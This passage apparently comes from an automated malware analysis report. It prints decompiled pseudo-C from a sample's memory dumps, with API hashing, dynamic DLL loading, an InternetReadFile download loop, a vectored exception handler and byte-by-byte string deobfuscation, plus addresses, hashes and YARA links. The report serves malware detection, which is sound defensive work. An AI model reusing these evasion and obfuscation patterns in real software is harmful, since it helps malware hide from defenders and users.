												if(_t206 == 0) {
													E008BCE70(_t391);
												}
											}
											 *_t426 = 0;
											E008A8CA0(_t426 + 0x2cc);
											E008A8CA0(_t426 + 0x2c4);
											return 1;
										}
									}
								} else {
									goto L29;
								}
								goto L106;
								L28:
								asm("o16 nop [eax+eax]");
								_t389 =  *(_t389 + 0x180);
							} while (_t389 != 0);
							goto L29;
						}
					}
				}
				goto L106;
			}

0x008a6c5a
0x008a6c65
0x008a6c73
0x008a6c7a
0x008a6c7f
0x008a6c89
0x008a735c
0x008a74c4
0x008a74ce
0x008a74d0
0x008a74d5
0x008a7551
0x008a74d7
0x008a74d9
0x008a74dd
0x008a74e0
0x008a74e3
0x008a74ea
0x008a74ed
0x008a74f4
0x008a74f7
0x008a74fe
0x008a7501
0x008a7508
0x008a750b
0x008a7512
0x008a7515
0x008a751c
0x008a751f
0x008a7526
0x008a7529
0x008a7530
0x008a7533
0x008a7538
0x008a753d
0x008a753d
0x008a7540
0x008a7544
0x008a7549
0x008a754c
0x008a754c
0x008a754f
0x008a7553
0x008a7553
0x008a736e
0x008a7380
0x008a7385
0x008a7391
0x008a74b5
0x00000000
0x008a7397
0x008a7399
0x008a73c8
0x008a73cd
0x008a73d3
0x008a73d7
0x008a748c
0x008a7497
0x008a749d
0x008a749d
0x008a748c
0x008a73df
0x008a73e8
0x008a73f0
0x00000000
0x008a73f0
0x008a739b
0x008a739d
0x008a739d
0x008a739f
0x008a73a1
0x008a73af
0x008a73b0
0x008a73b6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008a73b6
0x008a74a4
0x008a74aa
0x008a73f2
0x008a73f4
0x008a7407
0x008a7407
0x008a74b0
0x00000000
0x008a74b0
0x00000000
0x008a73b8
0x008a73b8
0x008a73be
0x008a73c4
0x00000000
0x008a739d
0x008a7399
0x008a7409
0x008a741b
0x008a7426
0x008a7426
0x008a742b
0x008a743b
0x008a7447
0x008a7447
0x008a744c
0x008a745c
0x008a746f
0x008a7474
0x008a6c8f
0x008a6c95
0x008a72bc
0x008a72c6
0x008a72c8
0x008a72cd
0x008a7349
0x008a72cf
0x008a72d1
0x008a72d5
0x008a72d8
0x008a72db
0x008a72e2
0x008a72e5
0x008a72ec
0x008a72ef
0x008a72f6
0x008a72f9
0x008a7300
0x008a7303
0x008a730a
0x008a730d
0x008a7314
0x008a7317
0x008a731e
0x008a7321
0x008a7328
0x008a732b
0x008a7330
0x008a7335
0x008a7335
0x008a7338
0x008a733c
0x008a7341
0x008a7344
0x008a7344
0x008a7347
0x008a734b
0x008a734b
0x008a6ca7
0x008a6cb9
0x008a6cbe
0x008a6cca
0x008a72ad
0x00000000
0x008a6cd0
0x008a6cd2
0x008a6d01
0x008a6d06
0x008a6d0c
0x008a6d10
0x008a7284
0x008a728f
0x008a7295
0x008a7295
0x008a7284
0x008a6d18
0x008a6d21
0x008a6d29
0x00000000
0x008a6d29
0x008a6cd4
0x008a6cd6
0x008a6cd6
0x008a6cd8
0x008a6cda
0x008a6ce8
0x008a6ce9
0x008a6cef
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008a6cef
0x008a729c
0x008a72a2
0x008a6d2b
0x008a6d2d
0x008a6d40
0x008a6d40
0x00000000
0x008a72a8
0x00000000
0x008a72a8
0x00000000
0x008a6cf1
0x008a6cf1
0x008a6cf7
0x008a6cfd
0x00000000
0x008a6cd6
0x008a6cd2
0x008a6d42
0x008a6d54
0x008a6d5f
0x008a6d5f
0x008a6d64
0x008a6d74
0x008a6d80
0x008a6d80
0x008a6d85
0x008a6d95
0x008a6da8
0x008a6dad
0x008a6dad
0x008a6db4
0x008a6dc9
0x008a6ddc
0x008a6de1
0x008a6df1
0x008a6dfb
0x008a6e09
0x008a6e20
0x008a6e27
0x008a6e2e
0x008a6e35
0x008a6e3c
0x008a6e47
0x008a6e57
0x008a6e6a
0x008a6e6b
0x008a6e70
0x008a6e72
0x008a6e77
0x008a6e7c
0x008a6e88
0x008a6e98
0x008a6ea4
0x008a6eab
0x008a6eae
0x008a6eb3
0x008a6eb7
0x008a6ecb
0x008a6ed0
0x008a6edd
0x008a71d9
0x008a71dd
0x008a71e7
0x008a71e9
0x008a71ee
0x008a71f9
0x008a71f5
0x008a71f5
0x008a71f5
0x008a7200
0x008a7203
0x008a7203
0x008a7200
0x008a7208
0x008a7216
0x008a7222
0x008a7233
0x008a6ee3
0x008a6ee3
0x008a6ee9
0x008a6eed
0x008a6ef4
0x008a6efe
0x008a6f0b
0x008a6f1e
0x008a6f3a
0x008a6f48
0x008a6f4f
0x00000000
0x00000000
0x008a71b8
0x008a71c4
0x008a71d3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008a71d3
0x008a6f57
0x008a6f6b
0x008a6f80
0x008a6f85
0x008a6f9c
0x008a6fa4
0x008a6fb7
0x008a6fc2
0x008a6fd5
0x008a6fdd
0x008a6fe3
0x008a6feb
0x008a6fef
0x008a6ff4
0x008a6ffa
0x008a700b
0x008a7269
0x00000000
0x008a7011
0x008a7013
0x008a7042
0x008a7047
0x008a704d
0x008a7051
0x008a7240
0x008a724b
0x008a7251
0x008a7251
0x008a7240
0x008a7059
0x00000000
0x008a705f
0x008a7066
0x008a706e
0x00000000
0x008a706e
0x008a7015
0x008a7017
0x008a7017
0x008a7019
0x008a701b
0x008a7029
0x008a702a
0x008a7030
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008a7030
0x008a7258
0x008a725e
0x008a7070
0x008a7072
0x008a7126
0x008a712e
0x00000000
0x00000000
0x00000000
0x00000000
0x008a7078
0x008a7093
0x008a709d
0x008a70a7
0x008a70ae
0x008a70ba
0x008a70c6
0x008a70cf
0x008a70d9
0x008a70db
0x008a70e0
0x008a70eb
0x008a70e7
0x008a70e7
0x008a70e7
0x008a70f2
0x008a70f5
0x008a70f5
0x008a70f2
0x008a70fa
0x008a7108
0x008a7114
0x008a7125
0x008a7134
0x008a7134
0x008a713b
0x008a7147
0x008a7153
0x008a715c
0x008a7166
0x008a7168
0x008a716d
0x008a7178
0x008a7174
0x008a7174
0x008a7174
0x008a717f
0x008a7182
0x008a7182
0x008a717f
0x008a7187
0x008a7195
0x008a71a1
0x008a71b5
0x008a71b5
0x008a709d
0x008a7264
0x00000000
0x008a7264
0x00000000
0x008a7032
0x008a7032
0x008a7038
0x008a703e
0x00000000
0x008a7017
0x008a7013
0x008a700b
0x00000000

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000000,?,00000000), ref: 008A7093

Strings

8Z, xrefs: 008A6C7F, 008A6D64, 008A6D85, 008A734B, 008A742B, 008A744C, 008A7553

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID: Load
String ID: 8Z
API String ID: 2234796835-2280653127
Opcode ID: cb2d8ad848b5970b0db6d6e97ad5e837d43df9bd8d2452c234c9bc946e70acd4
Instruction ID: 7bde3ffbeb3584451eeccddfa91258c166a0df11e1ddee9d5438f0000950de01
Opcode Fuzzy Hash: cb2d8ad848b5970b0db6d6e97ad5e837d43df9bd8d2452c234c9bc946e70acd4
Instruction Fuzzy Hash: 3322D1306183459BE764EB28CC56BEE73A5FF92300F54892CE54AC7692EF709805DB63

Uniqueness

Uniqueness Score: -1.00%

Function 008C39F9, Relevance: 1.7, APIs: 1, Instructions: 157
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E008C39F9(void* __eax, signed int __ebx, void* __edi) {
				long _t42;
				void* _t60;
				long _t63;
				long _t64;
				void* _t79;
				void* _t81;
				signed int _t86;
				void* _t124;
				void* _t128;
				void* _t133;
				long* _t134;
				void* _t139;

				_t124 = __edi;
				_t86 = __ebx;
				if(__eax == 0) {
					_t42 = E008A7F00();
					__eflags = _t42;
					if(_t42 != 0) {
						 *_t134 = _t42;
						E008A8CA0(_t139 + 0x34);
						E008A8CA0(_t139 + 0x44);
						goto L14;
					} else {
						goto L1;
					}
				} else {
					L1:
					E008A83B0(_t139 + 0x2c);
					E008B0B30(_t139 + 0x40,  *((intOrPtr*)(_t139 + 0x34)),  *((intOrPtr*)(_t139 + 0x2c)));
					E008B0B10(_t139 + 0x2c);
					_t130 = _t139;
					E008B50A0(_t139 + 0x44, _t139, 0x8c9424);
					E008B3B00(_t86, _t130);
					E008B7560(_t130, _t124, _t130);
					 *((char*)( *((intOrPtr*)(E008B7600(_t86, 0))))) = 0;
					_t143 = _t134[0xa] - 1;
					if(_t134[0xa] > 1) {
						 *(_t139 + 0xc) = _t134;
						_t128 = 1;
						_t133 = _t139 + 0x54;
						while(1) {
							_t79 = E008B7600(_t86, _t128);
							_push(1);
							_push(0x8ca9e0);
							E008A1BA0(_t143, _t133);
							_t81 = E008B0ED0(_t79, _t128,  *((intOrPtr*)(_t139 + 0x54)));
							E008B0B10(_t133);
							if(_t81 != 0) {
								break;
							}
							_t128 = _t128 + 1;
							if(_t128 <  *_t86) {
								continue;
							} else {
								_t134 =  *(_t139 + 0xc);
							}
							goto L6;
						}
						_t134 =  *(_t139 + 0xc);
						 *((char*)( *((intOrPtr*)(E008B7600(_t86, _t128))))) = 0;
					}
					L6:
					E008B3EC0(_t86);
					_push(0);
					E008B9350(_t139 + 0x10);
					_push(0x2800);
					E008B9350(_t139 + 0x20);
					while(1) {
						 *(_t139 + 0x5c) = 0;
						if(E008A15C0(0xd27f045a, 0x547ac48e) == 0) {
							break;
						}
						_t60 = E008B9640(_t139 + 0x20, 0);
						_t63 = InternetReadFile(_t134[4], _t60, E008B9650(_t139 + 0x1c), _t139 + 0x5c); // executed
						__eflags = _t63;
						if(_t63 == 0) {
							_t64 = E008A7F00();
							__eflags = _t64;
							if(_t64 != 0) {
								L9:
								 *_t134 = _t64;
								E008B9510(_t139 + 0x1c);
								E008B9510(_t139 + 0xc);
								E008A8CA0(_t139 + 0x34);
								E008A8CA0(_t139 + 0x44);
								L14:
								E008B0B10(_t139 + 0x3c);
								_push(0);
								E008B9350( *((intOrPtr*)(_t139 + 0x78)));
								return  *((intOrPtr*)(_t139 + 0x74));
							} else {
								goto L11;
							}
						} else {
							L11:
							__eflags =  *(_t139 + 0x5c);
							if( *(_t139 + 0x5c) == 0) {
								_push(_t139 + 0xc);
								E008B93D0( *((intOrPtr*)(_t139 + 0x78)));
								E008B9510(_t139 + 0x1c);
								E008B9510(_t139 + 0xc);
								E008A8CA0(_t139 + 0x34);
								E008A8CA0(_t139 + 0x44);
								E008B0B10(_t139 + 0x3c);
								return  *((intOrPtr*)(_t139 + 0x74));
							} else {
								E008B9710(_t139 + 0x14, E008B9640(_t139 + 0x20, 0),  *(_t139 + 0x5c));
								continue;
							}
						}
						goto L22;
					}
					_t64 = 0x7f;
					goto L9;
				}
				L22:
			}

0x008c39f9
0x008c39f9
0x008c39fb
0x008c3c44
0x008c3c49
0x008c3c4b
0x008c3b6d
0x008c3b74
0x008c3b7d
0x00000000
0x008c3c51
0x00000000
0x008c3c51
0x008c3a01
0x008c3a01
0x008c3a09
0x008c3a16
0x008c3a1f
0x008c3a24
0x008c3a31
0x008c3a39
0x008c3a40
0x008c3a50
0x008c3a53
0x008c3a57
0x008c3a59
0x008c3a5d
0x008c3a62
0x008c3a66
0x008c3a69
0x008c3a70
0x008c3a72
0x008c3a78
0x008c3a83
0x008c3a8c
0x008c3a95
0x00000000
0x00000000
0x008c3a9b
0x008c3a9e
0x00000000
0x008c3aa0
0x008c3aa0
0x008c3aa0
0x00000000
0x008c3a9e
0x008c3c30
0x008c3c3c
0x008c3c3c
0x008c3aa4
0x008c3aa6
0x008c3aab
0x008c3ab1
0x008c3ab6
0x008c3abf
0x008c3ac4
0x008c3ac4
0x008c3adf
0x00000000
0x00000000
0x008c3b1b
0x008c3b35
0x008c3b37
0x008c3b39
0x008c3c1c
0x008c3c21
0x008c3c23
0x008c3ae6
0x008c3ae6
0x008c3aed
0x008c3af6
0x008c3aff
0x008c3b08
0x008c3bb1
0x008c3bb5
0x008c3bba
0x008c3bc0
0x008c3bd0
0x008c3c29
0x00000000
0x008c3c29
0x008c3b3f
0x008c3b3f
0x008c3b3f
0x008c3b44
0x008c3bd7
0x008c3bdc
0x008c3be5
0x008c3bee
0x008c3bf7
0x008c3c00
0x008c3c09
0x008c3c19
0x008c3b4a
0x008c3b5e
0x00000000
0x008c3b5e
0x008c3b44
0x00000000
0x008c3b39
0x008c3ae1
0x00000000
0x008c3ae1
0x00000000

APIs

InternetReadFile.WININET(?,00000000,00000000,00000000,00000000,D27F045A,547AC48E), ref: 008C3B35

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: cf7c895ef5773b5a256c4a425bac00e0b3d08c69c0419b78b318ec390a4416d7
Instruction ID: fa2c1aa2f5a0b66cf837c41ca1453df910ba90edb19d2d1c1750214c3f8883fc
Opcode Fuzzy Hash: cf7c895ef5773b5a256c4a425bac00e0b3d08c69c0419b78b318ec390a4416d7
Instruction Fuzzy Hash: 7F511C312182049FD705EB28C852BAFB3A5FF91754F50882DF596D6291EE31DE06CB63

Uniqueness

Uniqueness Score: -1.00%

Function 008A22A0, Relevance: 1.6, APIs: 1, Instructions: 69
nativeCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E008A22A0(void* __ecx, intOrPtr __edx) {
				intOrPtr* _v8;
				intOrPtr _v24;
				intOrPtr* _t10;
				void* _t13;
				void* _t18;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr* _t22;
				intOrPtr* _t23;
				intOrPtr* _t24;

				_t19 = __edx;
				_t24 =  &_v8;
				if(__ecx == 0) {
					 *_t24 = 0;
					_v8 = 0;
				} else {
					 *_t24 = E008A1230(0xffffd8f0, 0xffffffff, __ecx, 0);
					_v24 = _t19;
				}
				_t20 =  *0x8cb1f4; // 0xec1568
				if(_t20 == 0xc139578) {
					 *0x8cb1f4 = 0;
					_t20 = 0;
				}
				if(_t20 == 0) {
					L10:
					_push(0x588ab3ea);
					_t10 = E008A7564(0x588ab3ea);
					_t23 = _t10;
					if(_t23 == 0) {
						_t10 = E008A6C50(0x588ab3ea);
						if(_t10 != 0) {
							_push(0x588ab3ea);
							_t10 = E008A7564(0x588ab3ea);
							_t23 = _t10;
						}
					}
					if(_t23 == 0) {
						goto L15;
					} else {
						_t24 = _t24 + 0xfffffff8;
						_t10 = E008A67C8(_t23, 0xcd123e03);
						_t22 = _t10;
						goto L13;
					}
				} else {
					do {
						_t18 = 0;
						_t10 = 0;
						while( *((intOrPtr*)(_t10 + _t20 + 8)) != 0xcd123e03) {
							_t18 = _t18 + 1;
							_t10 = _t10 + 0x18;
							if(_t18 < 0x10) {
								continue;
							}
							goto L9;
						}
						_t22 =  *((intOrPtr*)(_t10 + _t20 + 0x14));
						if(_t22 != 0) {
							L13:
							if(_t22 == 0) {
								L15:
								return _t10;
							}
							_t13 =  *_t22(0, _t24); // executed
							return _t13;
						}
						goto L10;
						L9:
						asm("o16 nop [eax+eax]");
						_t20 =  *((intOrPtr*)(_t20 + 0x180));
					} while (_t20 != 0);
					goto L10;
				}
			}

0x008a22a0
0x008a22a1
0x008a22a6
0x008a22c2
0x008a22c5
0x008a22a8
0x008a22b7
0x008a22ba
0x008a22ba
0x008a22c9
0x008a22d5
0x008a22d7
0x008a22e1
0x008a22e1
0x008a22e5
0x008a230e
0x008a2313
0x008a2314
0x008a2319
0x008a231d
0x008a234a
0x008a2351
0x008a2358
0x008a2359
0x008a235e
0x008a235e
0x008a2351
0x008a2321
0x00000000
0x008a2323
0x008a232a
0x008a232d
0x008a2332
0x00000000
0x008a2332
0x008a22e7
0x008a22e7
0x008a22e7
0x008a22e9
0x008a22eb
0x008a22f5
0x008a22f6
0x008a22fc
0x00000000
0x00000000
0x00000000
0x008a22fc
0x008a2362
0x008a2368
0x008a2334
0x008a2336
0x008a2344
0x008a2344
0x008a2344
0x008a233e
0x00000000
0x008a233e
0x00000000
0x008a22fe
0x008a22fe
0x008a2304
0x008a230a
0x00000000
0x008a22e7

APIs

NtDelayExecution.NTDLL(00000000,00000000), ref: 008A233E

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: 83243b65aa2da29c3d7ab37c78d9637450b84120d314d7dca26ef7292ad4753d
Instruction ID: 1f49164f9d12ffeb04fba88145ee127d8bb32e7f98d4dea919b1c48a6a135520
Opcode Fuzzy Hash: 83243b65aa2da29c3d7ab37c78d9637450b84120d314d7dca26ef7292ad4753d
Instruction Fuzzy Hash: 9011D630E086024BFA38A62C4C41B2A71D6FF83714F2DC22DD845DBF99FA34CC008292

Uniqueness

Uniqueness Score: -1.00%

Function 008A7A60, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E008A7A60(intOrPtr* __ecx) {
				void* _t1;

				_push(E008A7D40);
				_push(1); // executed
				_t1 =  *__ecx(); // executed
				return _t1;
			}

0x008a7a60
0x008a7a65
0x008a7a67
0x008a7a69

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,008A7D40,008A7A11,588AB3EA,?,?,00895168,00000001), ref: 008A7A67

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: 92a17d3e75dd0a927bac5fc0eec05794f0f8010eccd6aa836569f9f48cdc009d
Instruction ID: 43f20ace6e012ce39f50797d0c2b2a0d2438b27581cf34d1dca55910f1d2dd05
Opcode Fuzzy Hash: 92a17d3e75dd0a927bac5fc0eec05794f0f8010eccd6aa836569f9f48cdc009d
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 10002210, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 361
registryCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E10002210() {
				long _v8;
				char* _v12;
				intOrPtr _v16;
				long _t374;
				intOrPtr _t536;

				_v16 = RegOpenKeyA;
				_v12 = "interface\\{b196b287-bab4-101a-b69c-00aa00341d07}";
				 *_v12 = 0x9c;
				 *_v12 = ( *_v12 & 0x000000ff) - 0x33;
				_v12[1] = 0xa1;
				_t9 =  &(_v12[1]); // 0x7265746e
				_v12[1] = ( *_t9 & 0x000000ff) - 0x33;
				_v12[2] = 0xa7;
				_t15 =  &(_v12[2]); // 0x66726574
				_v12[2] = ( *_t15 & 0x000000ff) - 0x33;
				_v12[3] = 0x98;
				_t21 =  &(_v12[3]); // 0x61667265
				_v12[3] = ( *_t21 & 0x000000ff) - 0x33;
				_v12[4] = 0xa5;
				_t27 =  &(_v12[4]); // 0x63616672
				_v12[4] = ( *_t27 & 0x000000ff) - 0x33;
				_v12[5] = 0x99;
				_t33 =  &(_v12[5]); // 0x65636166
				_v12[5] = ( *_t33 & 0x000000ff) - 0x33;
				_v12[6] = 0x94;
				_t39 =  &(_v12[6]); // 0x5c656361
				_v12[6] = ( *_t39 & 0x000000ff) - 0x33;
				_v12[7] = 0x96;
				_t45 =  &(_v12[7]); // 0x7b5c6563
				_v12[7] = ( *_t45 & 0x000000ff) - 0x33;
				_v12[8] = 0x98;
				_t51 =  &(_v12[8]); // 0x627b5c65
				_v12[8] = ( *_t51 & 0x000000ff) - 0x33;
				_v12[9] = 0x8f;
				_t57 =  &(_v12[9]); // 0x31627b5c
				_v12[9] = ( *_t57 & 0x000000ff) - 0x33;
				_v12[0xa] = 0xae;
				_t63 =  &(_v12[0xa]); // 0x3931627b
				_v12[0xa] = ( *_t63 & 0x000000ff) - 0x33;
				_v12[0xb] = 0x95;
				_t69 =  &(_v12[0xb]); // 0x36393162
				_v12[0xb] = ( *_t69 & 0x000000ff) - 0x33;
				_v12[0xc] = 0x64;
				_t75 =  &(_v12[0xc]); // 0x62363931
				_v12[0xc] = ( *_t75 & 0x000000ff) - 0x33;
				_v12[0xd] = 0x6c;
				_t81 =  &(_v12[0xd]); // 0x32623639
				_v12[0xd] = ( *_t81 & 0x000000ff) - 0x33;
				_v12[0xe] = 0x69;
				_t87 =  &(_v12[0xe]); // 0x38326236
				_v12[0xe] = ( *_t87 & 0x000000ff) - 0x33;
				_v12[0xf] = 0x95;
				_t93 =  &(_v12[0xf]); // 0x37383262
				_v12[0xf] = ( *_t93 & 0x000000ff) - 0x33;
				_v12[0x10] = 0x65;
				_v12[0x10] = (_v12[0x10] & 0x000000ff) - 0x33;
				_v12[0x11] = 0x6b;
				_v12[0x11] = (_v12[0x11] & 0x000000ff) - 0x33;
				_v12[0x12] = 0x6a;
				_v12[0x12] = (_v12[0x12] & 0x000000ff) - 0x33;
				_v12[0x13] = 0x60;
				_v12[0x13] = (_v12[0x13] & 0x000000ff) - 0x33;
				_v12[0x14] = 0x95;
				_v12[0x14] = (_v12[0x14] & 0x000000ff) - 0x33;
				_v12[0x15] = 0x94;
				_v12[0x15] = (_v12[0x15] & 0x000000ff) - 0x33;
				_v12[0x16] = 0x95;
				_v12[0x16] = (_v12[0x16] & 0x000000ff) - 0x33;
				_v12[0x17] = 0x67;
				_v12[0x17] = (_v12[0x17] & 0x000000ff) - 0x33;
				_v12[0x18] = 0x60;
				_v12[0x18] = (_v12[0x18] & 0x000000ff) - 0x33;
				_v12[0x19] = 0x64;
				_v12[0x19] = (_v12[0x19] & 0x000000ff) - 0x33;
				_v12[0x1a] = 0x63;
				_v12[0x1a] = (_v12[0x1a] & 0x000000ff) - 0x33;
				_v12[0x1b] = 0x64;
				_v12[0x1b] = (_v12[0x1b] & 0x000000ff) - 0x33;
				_v12[0x1c] = 0x94;
				_v12[0x1c] = (_v12[0x1c] & 0x000000ff) - 0x33;
				_v12[0x1d] = 0x60;
				_v12[0x1d] = (_v12[0x1d] & 0x000000ff) - 0x33;
				_v12[0x1e] = 0x95;
				_v12[0x1e] = (_v12[0x1e] & 0x000000ff) - 0x33;
				_v12[0x1f] = 0x69;
				_v12[0x1f] = (_v12[0x1f] & 0x000000ff) - 0x33;
				_v12[0x20] = 0x6c;
				_v12[0x20] = (_v12[0x20] & 0x000000ff) - 0x33;
				_v12[0x21] = 0x96;
				_v12[0x21] = (_v12[0x21] & 0x000000ff) - 0x33;
				_v12[0x22] = 0x60;
				_v12[0x22] = (_v12[0x22] & 0x000000ff) - 0x33;
				_v12[0x23] = 0x63;
				_v12[0x23] = (_v12[0x23] & 0x000000ff) - 0x33;
				_v12[0x24] = 0x63;
				_v12[0x24] = (_v12[0x24] & 0x000000ff) - 0x33;
				_v12[0x25] = 0x94;
				_v12[0x25] = (_v12[0x25] & 0x000000ff) - 0x33;
				_v12[0x26] = 0x94;
				_v12[0x26] = (_v12[0x26] & 0x000000ff) - 0x33;
				_v12[0x27] = 0x63;
				_v12[0x27] = (_v12[0x27] & 0x000000ff) - 0x33;
				_v12[0x28] = 0x63;
				_v12[0x28] = (_v12[0x28] & 0x000000ff) - 0x33;
				_v12[0x29] = 0x66;
				_v12[0x29] = (_v12[0x29] & 0x000000ff) - 0x33;
				_v12[0x2a] = 0x67;
				_v12[0x2a] = (_v12[0x2a] & 0x000000ff) - 0x33;
				_v12[0x2b] = 0x64;
				_v12[0x2b] = (_v12[0x2b] & 0x000000ff) - 0x33;
				_v12[0x2c] = 0x97;
				_v12[0x2c] = (_v12[0x2c] & 0x000000ff) - 0x33;
				_v12[0x2d] = 0x63;
				_v12[0x2d] = (_v12[0x2d] & 0x000000ff) - 0x33;
				_v12[0x2e] = 0x6a;
				_v12[0x2e] = (_v12[0x2e] & 0x000000ff) - 0x33;
				_v12[0x2f] = 0xb0;
				_v12[0x2f] = (_v12[0x2f] & 0x000000ff) - 0x33;
				E100010E0(_v12);
				_t536 =  *0x10008000; // 0x80074ea8
				_t374 = RegOpenKeyA(_t536 - 0x74ea8, _v12, 0x10009da8);
				_v8 = _t374;
				if(_v8 != 0) {
					while(1) {
						_t374 = 1;
						if(1 == 0) {
							goto L4;
						}
					}
				}
				L4:
				return _t374;
			}

0x1000221b
0x1000221e
0x10002228
0x10002237
0x1000223c
0x10002243
0x1000224d
0x10002253
0x1000225a
0x10002264
0x1000226a
0x10002271
0x1000227b
0x10002281
0x10002288
0x10002292
0x10002298
0x1000229f
0x100022a9
0x100022af
0x100022b6
0x100022c0
0x100022c6
0x100022cd
0x100022d7
0x100022dd
0x100022e4
0x100022ee
0x100022f4
0x100022fb
0x10002305
0x1000230b
0x10002312
0x1000231c
0x10002322
0x10002329
0x10002333
0x10002339
0x10002340
0x1000234a
0x10002350
0x10002357
0x10002361
0x10002367
0x1000236e
0x10002378
0x1000237e
0x10002385
0x1000238f
0x10002395
0x100023a6
0x100023ac
0x100023bd
0x100023c3
0x100023d4
0x100023da
0x100023eb
0x100023f1
0x10002402
0x10002408
0x10002419
0x1000241f
0x10002430
0x10002436
0x10002447
0x1000244d
0x1000245e
0x10002464
0x10002475
0x1000247b
0x1000248c
0x10002492
0x100024a3
0x100024a9
0x100024ba
0x100024c0
0x100024d1
0x100024d7
0x100024e8
0x100024ee
0x100024ff
0x10002505
0x10002516
0x1000251c
0x1000252d
0x10002533
0x10002544
0x1000254a
0x1000255b
0x10002561
0x10002572
0x10002578
0x10002589
0x1000258f
0x100025a0
0x100025a6
0x100025b7
0x100025bd
0x100025ce
0x100025d4
0x100025e5
0x100025eb
0x100025fc
0x10002602
0x10002613
0x10002619
0x1000262a
0x10002630
0x10002641
0x10002647
0x10002658
0x1000265e
0x1000266f
0x10002672
0x10002682
0x1000268f
0x10002692
0x10002699
0x1000269b
0x1000269b
0x100026a2
0x00000000
0x00000000
0x100026a4
0x1000269b
0x100026a9
0x100026a9

APIs

RegOpenKeyA.ADVAPI32(80000000,00000065,10009DA8), ref: 1000268F

Strings

interface\{b196b287-bab4-101a-b69c-00aa00341d07}, xrefs: 1000221E

Memory Dump Source

Source File: 00000004.00000002.2414838793.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.2414833027.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2414845005.0000000010004000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2414850179.0000000010007000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2414857446.0000000010008000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2414864270.000000001000A000.00000002.00020000.sdmp Download File

Similarity

API ID: Open
String ID: interface\{b196b287-bab4-101a-b69c-00aa00341d07}
API String ID: 71445658-3721302963
Opcode ID: 70ef6df9e80d59e171016e5f198c43c6ef583eba1dce0ab0df92c18635fd71a9
Instruction ID: 82f1461fb5ecb5f7515817cf6212aeaf414af0ded347fa287ba6a42e94e12ce6
Opcode Fuzzy Hash: 70ef6df9e80d59e171016e5f198c43c6ef583eba1dce0ab0df92c18635fd71a9
Instruction Fuzzy Hash: 7712FB35A083C99FCB05CFA8C19499CFFB26F56220F1882C9D4D56B387C671D696CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 008C3370, Relevance: 3.4, APIs: 2, Instructions: 366
networkCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E008C3370(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t102;
				signed int _t109;
				signed int _t118;
				signed int _t119;
				intOrPtr* _t128;
				signed int _t129;
				intOrPtr _t151;
				signed int _t153;
				signed int _t154;
				intOrPtr _t155;
				void* _t158;
				WCHAR* _t160;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				void* _t164;
				signed int _t165;
				WCHAR* _t166;
				void* _t167;
				void* _t169;
				short _t172;
				signed int _t174;
				signed int _t177;
				signed int _t179;
				signed int _t180;
				signed int _t181;
				signed int _t209;
				signed int _t226;
				signed int _t228;
				signed int _t229;
				intOrPtr _t230;
				signed int _t240;
				void* _t241;
				WCHAR* _t244;
				intOrPtr* _t249;
				void* _t253;
				short* _t254;

				_t254 = _t253 - 0x60;
				_t244 = 0;
				_t249 = __ecx;
				 *_t254 = 0;
				E008B06A0( &(_t254[4]), __ecx, 0);
				E008B06A0( &(_t254[8]), __ecx, 0);
				E008B06A0( &(_t254[0xc]), __ecx, 0);
				E008B06A0( &(_t254[0x10]), __ecx, 0);
				E008C4D50( &(_t254[2]),  *(_t254[0x3a]));
				_t172 =  *_t254;
				E008A8810( &(_t254[0x1e]), 0);
				E008A87A0( &(_t254[0x20]));
				E008A87A0( &(_t254[0x24]));
				_t102 = E008B0220( &(_t254[0x20]), _t254[0x26], 0);
				E008A87A0( &(_t254[0x28]));
				E008B0220(_t102, _t254[0x2a], 0);
				E008A8CA0( &(_t254[0x28]));
				E008A8CA0( &(_t254[0x24]));
				if(E008B1000( &(_t254[2])) == 0) {
					_t242 = _t254[2];
					_t169 = E008BD620(_t242, E008B6040(_t254[2], 0x7fffffff));
					if(_t169 != 0x97780db2) {
						__eflags = _t169 - 0x3ef665a6;
						if(_t169 == 0x3ef665a6) {
							 *(_t249 + 0x18) = 1;
						}
					} else {
						 *(_t249 + 0x18) = 0;
					}
				}
				if(E008A15C0(0xd27f045a, 0xe214cde) == 0) {
					__eflags =  *((char*)(_t249 + 0xc));
					if( *((char*)(_t249 + 0xc)) == 0) {
						L71:
						 *((char*)(_t249 + 0xc)) = 1;
						 *(_t249 + 8) = 0;
						goto L17;
					} else {
						_t180 =  *(_t249 + 8);
						__eflags = _t180;
						if(_t180 == 0) {
							L67:
							_t162 = 1;
						} else {
							__eflags = _t180 - 0xffffffff;
							if(_t180 == 0xffffffff) {
								goto L67;
							} else {
								_t162 = _t244;
